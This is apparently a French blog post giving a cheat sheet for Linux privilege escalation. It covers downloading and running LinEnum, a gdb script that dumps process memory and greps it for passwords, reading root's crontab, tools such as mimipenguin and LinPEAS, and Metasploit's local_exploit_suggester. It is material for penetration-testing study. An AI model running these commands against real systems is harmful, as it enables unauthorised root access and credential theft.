Escalade de privilèges avec Linux

Voir l’information qui peut nous permettre d’escalader nos privilèges vers un shell administrateur

# curl -o /LinEnum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# bash ./linEnum -r /tmp/report

Vérifier les protections utilisés
https://raw.githubusercontent.com/germainm/check_linux_defenses/main/enumerate_linux_defenses.sh

Extraire la mémoire d’un processus à la recherche de mots de passe



#!/bin/bash
#./dump-memory.sh <PID>
grep rw-p /proc/$1/maps \
    | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \
    | while read start stop; do \
    gdb --batch --pid $1 -ex \
    "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \
done

./dump-memory.sh <PID>
strings *.dump | grep -i password

mimipenguin peut retourver les mots de passe ( GDM password, Gnome Keyring, LightDM, VSFTPd, Apache2, OpenSSH )

Vérifier si les tâches schédulées sont vulnérables. Vous pouvez peut-être exploiter un script exécuté en tant qu’administrateurs (vulnérabilité wildcard (*), possibilité de créer des fichiers que le script pourrait utiliser, liens symboliques)

crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

D’autres outils comme lynis ou LinPEAS peuvent être utilisés

Voir aussi https://gtfobins.github.io et https://lolbas-project.github.io/ pour des idées d’utilitaires qui peuvent être utilisés pour avoir plus d’accès qu’initialement prévu.

Pour trouver des exploits avec metasploit, il faut d’abord upgrader la session en meterpreter. Pour se faire, nous mettons la session en background avec ctrl+z. Avec “sessions”, nous obtenons l’identifiant associé à la session. Par la suite, sessions -u id.Une nouvelle session sera crée. Par la suite, nous pouvons faire à nouveau un listing des sessions avec “sessions”. Par la suite, nous pouvons utiliser le module local_exploit_suggeste et régler le paramètre session avant de faire la recherche d’exploits.

use post/multi/recon/local_exploit_suggester
set session 2
run

Leave a Reply